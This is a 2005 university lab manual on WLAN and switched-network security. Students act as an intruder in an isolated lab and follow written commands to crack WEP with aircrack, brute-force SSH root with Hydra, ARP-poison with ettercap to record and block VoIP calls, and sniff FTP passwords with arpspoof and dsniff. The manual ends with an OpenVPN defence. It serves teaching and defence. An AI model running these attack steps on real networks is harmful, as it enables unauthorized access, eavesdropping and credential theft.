Laboratorytest Security in WLAN and in switched · PDF fileLaboratorytest Security in WLAN and...

Laboratorytest

Security in WLAN and in switched networks

Malte Spille

December 18, 2005

Contents

1 Introduction 4

2 Exercise Basics 5

2.1 General . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5

2.2 Linux . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6

2.3 Software . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7

3 Preparation questions 13

4 Laboratory con�guration 14

4.1 Topology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14

4.2 Components and systems . . . . . . . . . . . . . . . . . . . . . 17

5 Execution 18

5.1 WLAN-Con�guration . . . . . . . . . . . . . . . . . . . . . . . 18

5.2 Basic Con�guration Host A/B . . . . . . . . . . . . . . . . . . 19

5.2.1 Host A . . . . . . . . . . . . . . . . . . . . . . . . . . . 20

5.2.2 Host B . . . . . . . . . . . . . . . . . . . . . . . . . . . 20

5.3 WLAN-Scan . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21

5.4 WEP-Decryption . . . . . . . . . . . . . . . . . . . . . . . . . 22

5.5 Con�guration Sip-Clients . . . . . . . . . . . . . . . . . . . . . 24

5.6 Connection Wardriver . . . . . . . . . . . . . . . . . . . . . . 25

5.7 Service-Detection SIP and SSH . . . . . . . . . . . . . . . . . 26

5.8 SSH-Bruteforce-Attack against Host C . . . . . . . . . . . . . 27

1

CONTENTS CONTENTS

5.9 VoIP-Capture . . . . . . . . . . . . . . . . . . . . . . . . . . . 28

5.10 VoIP-Block . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30

5.11 Passwort-Sni�ng FTP-Account . . . . . . . . . . . . . . . . . 31

5.12 WLAN-protection with OpenVPN . . . . . . . . . . . . . . . . 33

6 Interpretation of test results 36

2

List of Figures

4.1 Topology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 16

3

Chapter 1

Introduction

The spreading of networks constantly progresses. In enterprises, in whichthe protection of sensitive data is particularly important, this propagationmeans to become a target for possible attacks, caused by the constantlygrowing complexity.The lab test Security in WLAN and in switched networks concerns itself withthe question, as one as unauthorized users can compromise an enterprise netby attacks on WLAN and LAN.From the view of a wardriver is tried to receive entrance to a network todiscover weak points, use these and �nally gain access to e.g. sensitive dataor receive passwords of administration accounts. Also the disturbance up toa complete deactivation of elementary services, like the voice communicationby means of �Voice over IP� (VoIP), is to be clari�ed.This attempt serves the purpose to point out, where points of attack in theassigned technology are, how and with which tools these can be used andhow one can protect oneself against the described attacks.

4

Chapter 2

Exercise Basics

In this chapter knowledge is to be obtained, which is necessary to be able towork on the exercise correctly. The software, Linux-basics and the topologyof the enterprise network are explained. An examination before beginning ofthe exercise is necessary for the execution of the test.

2.1 General

� What do with �<� and �>� characterized entries in listings mean?Entries within this clasping have to be replaced by group- /hardware-dependent values.

� What is a �Bruteforce�-Attack?By an Bruteforce-attack one understands a testing of all conceivableLogin/password combinations. One tries to receive (administrative)access to the target system. These attacks are usually accomplishedwith the use of dictionary lists, why it is advisable to not use �weak�passwords.

� I have a question concerning the accesspoint-con�guration!You can use the o�cial Cisco-documentation[2] on the �Auditor-LiveCD�in directory �/home/knoppix/Desktop/Documents�.

� Where is the test-�le?The test-�le is in �/home/stud� of the user �stud� on your groups FTP-Server.

5

2.2. Linux CHAPTER 2. Exercise Basics

� How do i use my usbstick?If your USB stick should not be recognized automatically, you can doit manually. Provide �rst a mount folder:

root@host#mkdir /mnt/usb

�Mount� the usbstick into this folder. The USB stick should be acces-sible in most cases over /dev/sda1:

root@host#mount /dev/sda1 /mnt/usb

You can now copy �les to /mnt/usb and work on the �le system. Aftercompletion unmount the usbstick with:

root@host#umount /mnt/usb

(umount without �n�)

2.2 Linux

� How can I di�erentiate between the interfaces?You can get an overview of all activated interfaces with �ifcon�g�. Ifyou give the additional parameter �-a�, also not activated interfaces areindicated. Identify your WLAN-card by a comparison of the MAC-addresses.

� How can I get assistance to a program?You get a short options-overview with �<program> -h�. For a detailedprogram-description use the man-pages: �man <program>�.There is also a command-overview in the �Documents�-folder on the�Auditor-LiveCD� (linuxquickref.jpg) and a detailed program descrip-tion under �gnu-linux-tools-summary.pdf�.

� What means a \ in console-listings?A \ represents a line-break. You can use Copy&Paste. The line-breakgets interpreted correctly by the shell.

� What means a . ?A point in a linux-command describes the current directory. The com-mand:

root@Host#cp /home/testuser/test .

copies the �le �test� from the home-directory of the user �testuser� inthe current directory.

6

2.3. Software CHAPTER 2. Exercise Basics

� Elementary Linux-commands :

Linuxcommandpwd Shows the current pathcd [directory] Changes to directoryls [options][directory] Shows the content of a directorymkdir [options][directory] Creates a new directorytouch �le Creates a new �lecat �le Shows content of �leclear Clears shell-contentmv [options] �le target-directory Moves �le into target-directory�nd [directory][search criterion] Searches in directory

2.3 Software

1. KismetUsed Version: 2005.04.R1Webpage: http://www.kismetwireless.net/Description: Kismet is a WLAN-scanner, which can spend detailedinformation about surrounding WLANs.

2. AircrackUsed Version: 2.1Webpage: http://www.cr0.net:8040/code/network/Description: Aircrack is a program-suite consisting of the programsairodump, aireplay, aircrack and airdecap. Aircrack makes a decodingof WEP-encryption for 802.11 networks possible.

3. EttercapUsed Version: NG-0.71Webpage: http://www.ettercap.sourceforge.net/Description: Ettercap is a program-suite, which can accomplish var-ious �Man-in-the-Middle�-Attacks. Sni�ng of live-connections is justas possible as the in�uence. Ettercap o�ers a interface for self-made�lters.

4. EtherealUsed Version: 0.10.11Webpage: http://www.ethereal.com/Description: Ethereal is a network-protocol analyser. Its used for

7


network-analysis, error-correction and protocol-development. Thereare versions for Unix, Linux and Windows.

5. TetherealUsed Version: 0.10.10Webpage: http://www.ethereal.com/docs/man-pages/tethereal.1.htmlDescription: Tethereal is a console-based port of Ethereal.

6. Dsni�Used Version: 2.4Webpage: http://www.naughty.monkey.org/ dugsong/dsni�/Description: Dsni� consists of various programs for the safety analysiswithin networks. For example, its possible to capture password us-ing the �Man-in-the-Middle�-Attack. Supported services and protocolsare FTP, Telnet, SMTP, HTTP, POP, poppass, NNTP, IMAP, SNMP,LDAP, Rlogin, RIP, OSPF, PPTP MS-CHAP, NFS, YP/NIS, SOCKS,X11, CVS, IRC, AIM, ICQ, Napster, PostgreSQL, Meeting Maker, Cit-rix ICA, Symantec pcAnywhere, NAI Sni�er, Microsoft SMB,OracleSQLNet, Sybase and Microsoft SQL.

7. X-LiteUsed Version: 2.0Webpage: http://www.xten.com/Description: X-Lite is a SIP-based softphone from CounterPath Solu-tions, Inc. X-Lite supports the codecs G.711u, G.711a, GSM, iLBCand Speex.

8. NmapUsed Version: 3.75Webpage: http://http://www.insecure.org/nmap/Description: Nmap is a network-scanner. Nmap can show detailedinformation like running services, active hosts and used operating sys-tems. The scanning of IP-ranges is supported.

9. HydraUsed Version: 4.4Webpage: http://www.thc.orgDescription: Hydra is a passwort-bruteforcer. Supported services areTELNET, FTP, HTTP-GET, HTTP-HEAD, HTTPS-GET, HTTP-HEAD, HTTP-PROXY, LDAP2, LADP3, SMB, SMBNT, MS-SQL,MYSQL, POSTGRES, REXEC, SOCKS5, VNC, POP3, IMAP, NNTP,PCNFS, ICQ, SAPR3, Cisco auth, Cisco enable, SMTP-AUTH, SSH2,SNMP, CVS and Cisco AAA. Dictionary-attacks are included.

8


10. pcattcpUsed Version: 2.01.01.08Webpage: http://www.pcausa.com/Utilities/pcattcp.htmDescription: pcattcp is a Windows-port of the Unix-program �tccp�.tccp is a tool for the measurement of throughput. TCP and UDP aresupported.

11. AsteriskUsed Version: 1.0.7Webpage: http://www.asterisk.org/Description: Asterisk is a free software telephone system. Asterisk sup-ports the VoIP-Protocols SIP and H.323. The function range exceedsa conventional telephone system.

12. vsftpdUsed Version: 2.0.3Webpage: http://vsftpd.beasts.org/Description: vsftpd is a ftp server. It stands under the GPL licenseand is available for Unix and Linux.

13. DHCP3-ServerUsed Version: 3.0.1-2Webpage: http://www.isc.org/index.plDescription: DHCP3 is a Dynamic Host Con�guration Protocol-Server(DHCP). Its task is the dynamic assignment of IP addresses at com-puters. DHCP3 runs under UNIX, Linux and Solaris.

14. OpenSSHUsed Version: 3.8.1p1Webpage: http://www.openssh.com/Description: OpenSSH is a free implementation of SSH and o�ers anencrypted connection to SSH systems. SSH is used for remote main-tenance and is considered as safe replacement for telnet and rlogin. Inaddition OpenSSH contains a program for safe copying of �les (scp)and a ftp server for secured connections (sftp).

15. OpenVPNUsed Version: 2.0Webpage: http://openvpn.net/Description: OpenVPN is an opensource-implementation of VPN. Itestablishes an encrypted connection of 2 (or more) networks over aninsecure medium. For encryption SSL/TLS is used. OpenVPN is used

9


for the connection of e.g. 2 locations of an enterprise or to secure a802.11-network.

16. User Mode LinuxUsed Version: depends on kernel-versionWebpage: http://user-mode-linux.sourceforge.net/Description: User mode Linux is an extension of the Linux kernel,enabling a host system to run multiple virtual systems. Concerningthis, it is for example possible to start one or more Linux systems asprocesses within another Linux system. Thus several virtual host canoperate at the same time on one physical system. The operational areaslie in the software development/testing and the network technology.

17. Debian GNU/LinuxUsed Version: 31r0a (sarge)Webpage: http://www.debian.org/Description: Debian is a free operating system, which falls back tosoftware of the GNU project1. Debian is free of charge and freelyaccessible. It is used frequently on server systems and o�ers a maximumof �exibility and scaling barness.

18. Auditor LinuxUsed Version: 200605-02Webpage: http://new.remote-exploit.org/Description: Auditor is a Linux-LiveCD based on the Knoppix-LiveCD.An installation of Auditor is not necessary and the usage of Auditora�ects not other operating systems.Auditor extends the standard Knoppix distribution by programs fromthe �eld of network security. The moreover one it stands under theGPL 2.0-license. Auditor is used among other things of the NSA andthe American Airforce.For the lab test the following components of the standard distributionwere added/removed:

Added :

� Scripts (/home/knoppix/Desktop/Scripts)

� sip-block.txt (Ettercap-Script for Sip-blocking uncompiled)

� sip-block.ef (Ettercap-Script for Sip-blocking compiled)

� Documents (/home/knoppix/Desktop/Documents)

1http://www.gnu.org/

10


� gnu-linux-tools-summary.pdf[1] (Documentation Linux-commandsdetailed)

� aironet_ap_con�guration.pdf[2] (Documentation AccesspointCisco 1200)

� linuxquickref.jpg[3] (Documentation Linux-commands short)

� Con�gurations2 (/home/knoppix/Desktop/Con�gurations)

� OpenVPN:

* vpn_wlan_Server1.conf (Con�guration Server 1)

* vpn_wlan_HostB_1-5.ovpn (Con�guration Host B)

* dh2048.pem

* vpn_wlan-ca.crt

* Server.key

* Server.crt

* HostB_1-5.crt

* HostB_1-5.key

� DHCP3-Server:

* dhcpd.conf (Con�guration DHCP3-Server)

� Thesis (/home/knoppix/Desktop/Thesis)

� Laborversuch_Sicherheit.pdf (Laboratorytest �Sicherheit imWLAN und in geswitchten Netzen�)

� Laboratorytest_Security.pdf (Laboratorytest �Security inWLANand in switched networks�, English)

� Diplomarbeit_MalteSpille.pdf (Thesis �Sicherheit im WLANund in geswitchten Netzen�)

� Other (/home/knoppix/Desktop/Other)

� ttcpzip.exe (Program pcattcp)

� openvpn-2.0.2-install.exe (Program OpenVPN)

� x_lite-counterpath_Win32_1105x_21407.exe (Program X-Lite)

� Password.txt (Passwordlist for ssh-bruteforce)

� Wallpaper.jpg (Wallpaper)

Removed :

� Programs/Packets

2Con�gurations for the services ssh, Asterisk and vsftpd are not listed, because theyare used within the UML-�les

11


� wine-utils

� wine

� libwine

12

Chapter 3

Preparation questions

To ensure a fast and problem-free execution of the lab test you have to solvethe following preparation questions. These serve a better understanding andshould facilitate the later handling of the tasks.

1. How does WEP function? Where are the weakpoints of WEP?

2. What is VPN? How does VPN function?

3. Give the advantages of a switched network. Compare the function of aswitch with the function of a hub.

4. What is a Man-in-the-Middle (Monkey-in-the-middle)-Attack?

5. What is ARP-Poisoning/-Spoo�ng?

13

Chapter 4

Laboratory con�guration

In this chapter an overview of the used topology is to be given. A target isto give an understanding for the used components, their operating systemsand their placement within the enterprise network.

4.1 Topology

The enterprise net is divided into two segments, a WLAN-segment and aLAN segment. Over the WLAN tied up computers (except Host B) receive aIP from the network 192.168.1.0/24 (range 192.168.1.230-192.168.1.250) viaDHCP. Computers, which are in the LAN segment, possess a static IP fromthe network 192.168.0.0/24.Both segments are separated by Server 1, which operates as DHCP serverand o�ers a routing function. For this purpose two �network interface cards�are placed in Server 1. In the later process of the laboratory exercise Server1 is additionally a VPN gateway (OpenVPN) used to secure the WLAN-connection.The LAN segment has a switch. This switch connects Host A, Host C, Server1 and Server 2.The moreover one are 2 authorized host in the LAN segment (Host A andHost C) and an authorized host in the WLAN segment (Host B). Host Bis connected with an accesspoint, which uses a hub to connect to Server 1and the LAN segment. Host C is prepared for each group separately as �usermode linux �, that means it runs as virtual system. Each Host C is therebyattainable with the IP 192.168.0.10x1/24. Host C o�ers a ssh service for

1x corresponds the groupnumber

14

4.1. Topology CHAPTER 4. Laboratory con�guration

remote maintenance.Host D is not authorized. This is the computer of the Wardrivers, which isused for the attacks on the enterprise network.Likewise with UML prepared is Server 2. Server 2 o�ers the Asterisk andthe FTP-server �vsftpd �. Server 2 can be attained for each group under192.168.0.3x1/24.

15

4.1. Topology CHAPTER 4. Laboratory con�guration

Figure 4.1: Topology

16

4.2. Components and systems CHAPTER 4. Laboratory con�guration

4.2 Components and systems

Operating systems:

� Microsoft Windows 2000 Prof.: Host A, Host B

� Debian GNU/Linux 31r0a (sarge): Server 1, Server 2 (via UML), HostC (via UML)

� Auditor Linux : Host D

Used by all groups:

� Server 1

� Hub

� Switch

Used by one group:

� Host A, Host B, Host D

� Server 2 (1 physical PC, 5 via UML)

� Host C (1 physical PC, 5 via UML)

� Accesspoint

17

Chapter 5

Execution

5.1 WLAN-Con�guration

Target:

� Con�guration of the accesspoint

To deliver:

� Conf_AP_x1

To use:

� Accesspoint

� Host A

A target is it to make an accesspoint available con�gured rudimentary whichis needed for the further treatment of the lab test.For execution the document stands for you: aironet_ap_con�guration.pdf[2].It's placed in �/home/knoppix/Desktop/Documents� and contains all neces-sary commands.For con�guration you can use Microsoft's �Hyperterminal� or �minicom�,which is placed on the Auditor-LiveCD.

1. Establish the physical connection over the console-port of Host A tothe accesspoint.

18

5.2. Basic Con�guration Host A/B CHAPTER 5. Execution

� 9600 bps

� Databits 8

� No Flowcontrol

� Password: Cisco

2. Set the hostname to ap_x1.

3. Delete the standard-ssid �tsunami�.

4. Set the ssid to group_x1.

5. Set the channel. For the �rst part of the attempt we want to produceconsciously interferences. For this, group 1 and 2 set their channel to6 and group 3,4 and 5 to 11.

6. Set the authentication-mode to �open�.

7. Activate the �guest-mode�.

8. Activate WEP and set a 40Bit WEP-key. Use unencrypted input.

9. Set the IP of the ethernet-interface to 192.168.1.x10/24. Don't useFastEthernet, but the bridge-interface �BVI�. Both the WLAN- andthe ethernet-interface are hereby accessible over the same IP.

10. Set the default-gateway to 192.168.1.2.

11. Connect the ethernet-interface with the hub according to the topology.

12. Save the con�guration: Conf_AP_x1.

5.2 Basic Con�guration Host A/B

Target:

� Con�guration of Host A and Host B

� Connectivitytests

� Throughputtests

1x indicated the groupnumber

19

5.2. Basic Con�guration Host A/B CHAPTER 5. Execution

To deliver:

� pcattcp-Scan_x1_1

� pcattcp-Scan_x1_2

To use:

� Host A

� Host B

Create the physical connection in accordance with illustration 4.1.

5.2.1 Host A

1. Deactivate the �ber-connection (Allied Telesyn AT-2700FX).

2. Activate the ethernet-card �3com EtherLink XL�.

3. Set the IP of Host A to 192.168.0.1x11/24.


5. Make sure you can reach Server 1 and Server 2. After con�guration ofHost B you should also be able to reach Host B.

5.2.2 Host B

1. Deactivate the �ber-connection (Allied Telesyn AT-2700FX).

2. Activate the WLAN-card �Cisco Systems 350Series PCI Wireless LANAdapter�.

3. Set the IP of Host B to 192.168.1.1x12/24.


5. Use the �Aironet Client Utility�, to con�gure WLAN-settings (WEP,ssid, etc.). Create a new pro�le. Make sure Host B is associated withthe accesspoint belonging to your group.

6. Connect Host B with the network.

20

5.3. WLAN-Scan CHAPTER 5. Execution

7. Make sure you can reach Host A, Host C and Server 2.

8. Use pcattcp to point out the power loss by channel laps. For this group1 with group 2 as well as group 3 and 4 with 5 co-operate. First makesure you can reach the Host B of the other group(s). Try to keep theconditions as constant as possible (space to AP, etc.).After starting the Windows-console move to the pcattcp-directory:

C:\>cd C:\Programme\pcattcp

One group starts pcattcp in receiver-mode on Host B:

C:\Programme\pcattcp>pcattcp -r

Host B of the second group starts pcattcp with

C:\Programme\pcattcp>pcattcp -t <IP Host B group 1>

The throughputtests can take some minutes.Repeat this steps to gain signi�cant results.

9. Create a screenshot of the pcattcp-scan. Name: pcattcp-Scan_x1_1.

10. Coordinate with the other groups and set a channel in such a way,that if possible, no interference arise. Make new pcattcp-scans. Thethroughput-rate should be better.

11. Create a screenshot of the new pcattcp-scan. Name: pcattcp-Scan_x1_2.

5.3 WLAN-Scan

Target:

� Scan the WLAN-network

� Detect group-speci�c WLAN-information

To deliver:

� WLAN-Scan_x1

To use:

� Host D

21

5.4. WEP-Decryption CHAPTER 5. Execution

We try to connect Host D to the encrypted companynetwork. Consider HostD is a not-authorized participant. First use the tool �Kismet� in order to�nd surrounding WLANs.

1. Start �Kismet� with the menu-entry Auditor>Wireless> Scanner/Analyzer>Kismet tools> Kismet.

2. For backup use the �tmp�-directory in �/ramdisk/home/knoppix�. Keepthe other settings.

3. Search for the network of your group and print out detailed information.(�h� gives you help). Should your network not show up, you can try touse �Probe Networks�.If you can't �nd your network use the program �iwlist� to show nearbyWLAN-networks.

root@HostD#iwlist wifi0 scan

4. Create a screenshot of the scan with �KSnapshot2�. Name: WLAN-Scan_x1.You can use �Konqueror� to view the image. If you kept the standard-path click on the house-symbol to move to your �Home�-directory. Thescreenshot should be placed here.

5. Quit �Kismet� with �Shift+q�.

5.4 WEP-Decryption

Target:

� Con�guration of the WLAN-card

� Decryption of a WEP-Key (40Bit)

To deliver:

� WEP-Key_x1

To use:

� Host D

2Applications> Graphics> KSnapshot

22

5.4. WEP-Decryption CHAPTER 5. Execution

Now we try to decrypt the WEP-Key with Host D. We use the programs�Airodump� and �Aircrack� of the �Aircrack�-suite.

1. Open up a console.

2. Associate Host D with your accesspoint. Compare the MAC-addressof your card with the output of �ifcon�g -a� and set ethx for <intf>.Don't mix wi�x (just for monitor-mode) and ethx up.

root@HostD#iwconfig <intf> essid group_x1

3. Check if Host D is associated with the accesspoint of your group:

root@HostD#iwconfig

Behind �Access Point� there should be the BSSID of your group. Ifit's not, make sure your accesspoint uses �guest-mode� and �SSID-Broadcast� is activated. Make sure you deleted the standard-SSID�tsunami�, too. Alternatively you can try to directly set the BSSID:

root@HostD#iwconfig <intf> ap <BSSID>

Make sure, you are connected with the accesspoint before proceedingwith the next step.

4. Start airodump to collect initializationvectors:

root@HostD#airodump wifi0 dump <Bssid>

The Bssid should be visible on the screenshot �WLAN-Scan�.Keep in mind to use the correct network-interface.

5. Establish a connection from Host B to the FTP-Server at 192.168.0.3x1.Use the account �stud�. The password is �rtk222�. Transfer the sample-�le from the �Home�-directory of �stud� to Host B. The collected ini-tializationvectors should fast increase. You need about 130000 IVs.This takes 10 minutes. In the meantime start with �Con�guration Sip-Client�.3

6. After collection of 130000 IVs start �Aircrack� to calculate the WEP-Key:

root@HostD#aircrack -n 64 dump.cap

3Aircrack o�ers attacks against accesspoints which can create arti�cial tra�c. This canbe used to attack less used networks. This depends on the hardware and is not supportedby the used Cisco-cards

23

5.5. Con�guration Sip-Clients CHAPTER 5. Execution

Note the fact, that the probability of calculating the WEP-key increaseswith rising numbers of IVs, but not reaches 100%. With 130000 IVs theprobability should be about 60% to calculate the key. If you shouldcollect more, that would positively a�ect itself. Since only limitedbandwidth is available, you should come to an agreement however withthe other groups, if you want to collect more than 130000 IVs.If you do not receive the key, set it as calculated. You know the functionmode.

7. Create a screenshot of the key with �KSnapshot�. Name: WEP-Key_x1.If you didn't receive the key take a screenshot with the same name.

5.5 Con�guration Sip-Clients

Target:

� Con�guration of the �X-Lite� softphones at Host A and Host B

� Performing of test-calls

To deliver:

� �

To use:

� Host A

� Host B

Con�gure Host A and Host B for the usage of the Asterisk-server. Establisha VoIP-connection between Host A and Host B.

1. Con�guration X-Lite Client:

� Sip Proxy> Default:

� Enabled: Yes

� Display Name: labor_x1_y4

4a for Host A, b for Host B- notice the lower case!

24

5.6. Connection Wardriver CHAPTER 5. Execution

� Username Name: labor_x1_y4

� Authorization User: labor_x1_y4

� Password: labor_x1_y4

� Domain/Realm: 192.168.0.3x1

� Sip Proxy: 192.168.0.3x1

� Out Bound Proxy: 192.168.0.3x1

2. Test the settings with test-calls between Host A and Host B. The num-ber is x10y5. If problems occur, test your connection to the Asterisk-server with a test-call to the number 663. Is everything con�guredcorrectly you should hear a demo-announcement.

5.6 Connection Wardriver

Target:

� Con�guration WLAN-card

� Establishment of a connection from Host D into the WLAN-segment

� Performing of connectivity-tests

To deliver:

� Ping_x1

To use:

� Host D

We want to establish a connection from the unauthorized PC Host D to thegroup-WLAN with the captured WEP-key.

1. Open up a console and set the WLAN-card into �Managed�-mode:

root@HostD#iwconfig <intf> mode Managed

51 for Host A, 2 for Host B

25

5.7. Service-Detection SIP and SSH CHAPTER 5. Execution

2. Set the parameters of the connection:

root@HostD#iwconfig <intf> essid group_x1

root@HostD#iwconfig <intf> key xxxx-xxxx-xx6

3. Request an IP with DHCP:

root@HostD#dhclient <intf>

4. Make a broadcast-ping to see all hosts within the network:

root@HostD#ping -b 192.168.1.255

5. Create a screenshot of the �ping� with �KSnapshot�. Name: Ping_x1

5.7 Service-Detection SIP and SSH

Target:

� Scanning of the network for SIP-services

� Scanning of the network for SSH-services

To deliver:

� SIP-Detection_x1

� SSH-Detection_x1

To use:

� Host D

You have a connection to the network and want to �nd interesting services,especially VoIP. This is why we look for Hosts o�ering a service at SIP-port5060. Use the network-scanner Nmap:

1. Start Nmap (Auditor> Scanning> Network Scanners> NmapFE)

� Targets: 192.168.0.*

� Scan Type: UDP-Port Scan

6x replace with WEP-Key

26

5.8. SSH-Bruteforce-Attack against Host C CHAPTER 5. Execution

� Scanned Ports (Range Given Below): 5060

2. Nmap will give a list. Look for for the message �open|�ltered�, theassociated computers are indicated with IP. These are the Asterisk-Servers, which o�ers a SIP-service at port 5060(udp) and already con-nected SIP-clients. In order to di�erentiate between the Clients and theservers, further scans could be performed. We presuppose the server at192.168.0.3x1 as given.

3. Create a screenshot of the scan with �KSnapshot�. Name: SIP-Detection_x1

4. Now, that you have found the Asterisk-Server, you have to try to �nda way into the 192.168.0.0/24-network. Test if a system o�ers a SSH-service (port 22) for remote-access. Use again Nmap:

� Targets: 192.168.0.*

� Scan Type: SYN Stealth Scan


At port 22 of Host C (192.168.0.10x1) eavesdrops a SSH-service. Useit to gain access to the network 192.168.0.0/24.

5. Create a screenshot of the scan with �KSnapshot�. Name: SSH-Detection_x1

5.8 SSH-Bruteforce-Attack against Host C

Target:

� Determination of the password for the SSH-login of user �root� on HostC

� Establishment of a connection via SSH to Host C


To deliver:

� SSH-PW_x1

� Ping-SSH-HostC_x1

To use:

27

5.9. VoIP-Capture CHAPTER 5. Execution

� Host C

� Host D

To gain access to 192.168.0.10x1 start a bruteforce-dictionary attack. Youtry to gain root-access directly. Use the program Xhydra. (Auditor> Brute-force> Xhydra):

� Single Target: 192.168.0.10x1

� Port: 22

� Protocol: ssh2

� Use SSL: yes

� Username: root

� Password List: Password.txt (Directory /home/knoppix/Desktop/Other)

1. Start Xhydra with the given parameters. You should get the passwordafter a while.

2. Create a screenshot of the password with �KSnapshot�. Name: SSH-PW_x1

3. Use the password to login at the Asterisk-Server via SSH:

root@HostD#ssh [email protected]

You should be able to reach all Hosts within the network 192.168.0.0/24.Try to ping Host A, Host B and Server 2.

4. Create a screenshot of the pings with �KSnapshot�. Name: Ping-SSH-HostC_x1

5.9 VoIP-Capture

Target:

� Performing of a MITM-attack between Server 2 and Host A

� Capture VoIP-call on Host C

28

5.9. VoIP-Capture CHAPTER 5. Execution

� Transfer of the call-dump�le to Host D

� Analysis and playback of the call at Host D

To deliver:

� RTP-Streams_x1

� RTP-Analysis_x1

To use:

� Host C

� Host D

Since we have now access to the network 192.168.0.0/24, we want to capturea discussion between two VoIP-participants. We use �Ettercap� and starta �Man-in-the-Middle�-attack by means of ARP-Poisoning between Host Aand the Asterisk server. Please note that under normal conditions programslike Ettercap would not be installed on a productivity-system. One wouldhave to install these e.g. via ssh.

1. In order to pass redirected packets on to their original receiver, youmust activate IP-forwarding on Host C:

root@UMLHostC_x1#echo "1" > /proc/sys/net/ipv4/ip_forward

2. Test which interface (ethx ) you can use on Host C:

root@UMLHostC_x1#ifconfig -a

3. Start Ettercap:

root@UMLHostC_x1#ettercap -i <intf> -Tqo -M arp:remote \

/192.168.0.3x1,1x11/

4. Start a second SSH-connection to Host C and use the program Tethe-real in order to capture arriving data-packets. Note that you have tobegin with the discussion, immediately after starting Tethereal.

root@UMLHostC_x1#tethereal -i <intf> -f udp -w dump_x1

5. Make a short call between Host A and Host B.

29

5.10. VoIP-Block CHAPTER 5. Execution

6. When �nished stop the recording and Ettercap. (Important:) StopEttercap not with CTRL+c or by simply closing the console. Useunconditionally �q�.

7. Copy �dump_x1� with Secure-Copy (scp) from Host C to Host D:

root@HostD#scp [email protected]:dump_x1 .

The password to use is the SSH-password.

8. Open the �le with Ethereal (Auditor> Analyzer> Network> Ethereal)on Host D.

9. Mark a RTP-packet> Statistics-RTP> Show All Streams> Mark thestreams in both directions (Payload= ITU-T G.711 PCMU)> Ana-lyze> Save payload> Save as <�le>

10. Create a screenshot of the RTP-streams with �KSnapshot�. Name:RTP-Streams_x1

11. Create a screenshot of the RTP-stream-analysis with �KSnapshot�. Name:RTP-Analysis_x1

12. Use the console-program �play� for playback:

root@HostD#play /home/knoppix/<file>

5.10 VoIP-Block

Target:

� Blocking of VoIP-communication

� Performing of test-calls

To deliver:

� VoIP-Block_x1

To use:

� Host C

30

5.11. Passwort-Sni�ng FTP-Account CHAPTER 5. Execution

Apart from monitoring a discussion it is also possible for us to completelyblock the use of VoIP. For this we use an interface of Ettercap, makingit possible to use external scripts. You can �nd the necessary script �sip-block.ef� on the Auditor LiveCD in �/home/knoppix/Desktop/Scripts�. Foroutlook it is present both in *.txt and in *.ef format necessary for Ettercap.

1. Copy the *.ef-format script to Host C:

root@HostD#cd /home/knoppix/Desktop/Scripts/

root@HostD#scp sip-block.ef [email protected]:

2. Establish a SSH-connection.

3. Block any SIP-communication between the Asterisk server and HostA. Start Ettercap with the script:

root@UMLHostC_x1#ettercap -i <intf> -Tq -F sip-block.ef \

-M ARP /192.168.0.3x1,1x11/

4. Try to make a call between Host A and Host B.

5. Create a screenshot of the block-messages with �KSnapshot�. Name:VoIP-Block_x1

6. Quit Ettercap(Important: Use the �q�-command to stop Ettercap).

5.11 Passwort-Sni�ng FTP-Account

Target:

� Performing of a MITM-attack

� Capture the password of a FTP-connection

To deliver:

� FTP-Detection_x1

� FTP-PW_x1

To use:

� Host C

31

5.11. Passwort-Sni�ng FTP-Account CHAPTER 5. Execution

� Host D

In this step we try to sni� passwords with the program-suite �Dsni��. Ex-emplarily we try to receive the login-information of a FTP-account. We usethe program �Arpspoof� (made available by Dsni�), in order to perform anARP-Spoo�ng attack against the FTP-server and a host.

1. Use Nmap on Host D again to scan the network for FTP-servers:

� Targets: 192.168.0.*

� Scan Type: SYN Stealth Scan


It should be listed Server 2 with the entry �21/tcp open ftp�. This isour target.

2. Create a screenshot of the scan with �KSnapshot�. Name: FTP-Detection_x1

3. Start a SSH-connection from Host D to Host C.

4. Guarantee that the kernel of Host C can forward rerouted packets tothe original target (this was deactivated by Ettercap in the previouspart):

root@UMLHostC_x1#echo "1" > /proc/sys/net/ipv4/ip_forward

5. Use Arpspoof to reroute the IP of the FTP-Server to Host C:

root@UMLHostC_x1#arpspoof -i <intf> 192.168.0.3x1

6. Start sni�ng with Dsni� within a second SSH-connection:

root@UMLHostC_x1#dsniff -c -m -i <intf>

7. Connect yourselves with a FTP-client (e.g. Windows Explorer) fromHost A to the FTP-server of your group. Use the standard account�stud� and the password �rtk222�. You should be able to see the login-information in plain text within the login-shell on Host C.

8. Create a screenshot of the login-information with �KSnapshot�. Name:FTP-PW_x1

9. Quit Dsni� and arpspoof with CTRL+c.

32

5.12. WLAN-protection with OpenVPN CHAPTER 5. Execution

5.12 WLAN-protection with OpenVPN

Target:

� Creation of a VPN-connection from Host B to Server 1


� Analyses of the connection

To deliver:

� VPN-Ethereal-tap_x1

� VPN-Ethereal-eth_1_x1

� VPN-Ethereal-eth_0_x1

� VPN-Ethereal-HostD_x1

To use:

� Host B

� Host D

� Server 1

In this step the weakWEP-encryption is to be replaced by a VPN-connection.We use the software OpenVPN. A target is the association with the access-point and a following connection between Host B and Server 1 via VPN.The interface 192.168.1.2 at Server 1 uses the packet-�lter �iptables� to �l-ter all packets, which do not have the target port 11947. So it is guaran-teed, that only OpenVPN-authenticated users have access to the network192.168.0.0/24.8

1. Connect with the WLAN-network of your group.

7Standard VPN port8With the utilisation of �iptables� the parallel work of multiple groups is not possible.

So we do not use �iptables� here.

33


2. Make sure, that in the OpenVPN-directory9 on Host B the �le vpn_wlan_HostB_x1.ovpnwithin the directory �con�g� is present. In �Zerti�kate� should vpn_wlan-ca.crt, HostB_x1.key and HostB_x1.crt be present.

3. Start the VPN-connection with a right-click on the con�guration-�leand choose the �start� option. If the initialization not ends with �Initial-isation Sequence Completed� or DHCP-related error-messages appeartry to deactivate the �tap�-interface within the �Netzwerkverbindun-gen� and then reactivate the interface. Afterwards try to establish anew connection.

4. It should be possible to ping the virtual interfaces 10.4.0.1 on Server 1.If this is the case, you have an encrypted tunnel between Host B andServer 1.

